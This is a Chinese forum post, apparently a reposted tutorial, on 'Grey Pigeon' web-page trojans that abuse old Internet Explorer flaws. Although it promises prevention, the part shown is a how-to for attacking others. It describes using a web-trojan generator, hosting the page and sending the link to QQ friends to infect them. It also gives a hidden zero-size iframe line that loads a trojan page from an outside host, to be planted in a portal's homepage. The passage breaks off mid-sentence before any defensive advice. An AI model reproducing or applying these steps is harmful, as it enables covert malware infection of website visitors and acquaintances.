请选择 进入手机版 | 继续访问电脑版
 找回密码
 立即注册

“灰鸽子”网页木马从原理、制作到防范

来源: 阿哈逸乐 2021-10-24 07:38:39 显示全部楼层 |阅读模式
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。   以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理
  首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
  有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
 ⒈自动下载程序
  
  把这段代码插入到网页源代码的…之间,然后用IE打开该网页,你会发现,这段代码可以在没有打相关补丁的IE6中自动打开记事本。
  这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,可以用它自动运行本地电脑上的任意程序。
  通过以上的代码我们可以看出,利用IE的漏洞,也就是说在网页中插入适当的代码,IE完全可以自动下载和运行程序,不过,IE一旦打了相关补丁,这些代码就会失去作用。另外,这些代码要运行和下载程序,有些杀毒软件的网页监控会视它们为病毒,为了逃避追杀,黑客可能会使用一些工具对网页的源代码进行加密处理(如图3)。
图3 加密后的网页代码二、网页木马的基本用法
  理解了网页木马攻击的原理,我们可以制作自己的网页木马,但这需要你根据IE漏洞写出利用代码。实际上,在网上有很多高手已写出了一些漏洞的利用代码,有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索,你会发现,在网上有很多利用IE的各种漏洞编写的网页木马生成器,它们大都为可视化的程序,只要你有一个木马(该木马必须把它放置到网络上),利用这些生成器你就可以立即生成一个网页,该网页就是网页木马,只要他人打开这个网页,该网页就可以自动完成下载木马并运行(安装)木马的过程。
  在我的电脑上我已下载了一个网页木马生成器,下面我们来看怎么生成网页木马并让他人中木马。
  第一步:启动该网页木马生成器,如图4所示,在文本框中输入木马的网络地址,最后单击“生成”。
图4 网页木马生成器  第二步:在网页木马生成器的安装文件夹会生成一个网页文件,该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或免费主面空间。
  现在好了,把上述网页在服务器上的地址(网址)通过QQ发给自己的好友,一旦他访问了该网页,该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。
  现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧!实际上,即使人人都不打开陌生人发来的网址,也仍然有一些人“飞蛾补灯,自寻死路”,因为若大的Internet,总会有一些人会有意或无意地访问这些网址,而且,有些网页木马,还挂在一些知名网站上(根据知名网站的访问量,你算算吧,每天有多少人中了木马!)。
  小提示:你可能还没想到,看电影,在论坛查看或回复帖子也能中木马。实际上,网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上,这样,用户一旦观看电影、查看或预览邮件(主要是一些用电子邮件群发器发送的垃圾邮件)、参与帖子,打开电子书,用户就会中网页木马。
  在下面我们只介绍黑客如何在知名网站上挂网页木马。下面来看这一段代码:iframe src="http://go163go.vicp.net/hk.htm" width="0" height="0" frameborder="0">
小提示:“src”的属性“http://go163go.vicp.net/hk.htm”是上传到服务器上的网页木马的网址。
  把这段代码插入到某门户网站首页源代码的…之间,从表面上看,插入后该门户的首页并没有什么变化,但是,所有访问了该门户网站首页的人都会中木马,为什么会这样呢?这是因为这段代码中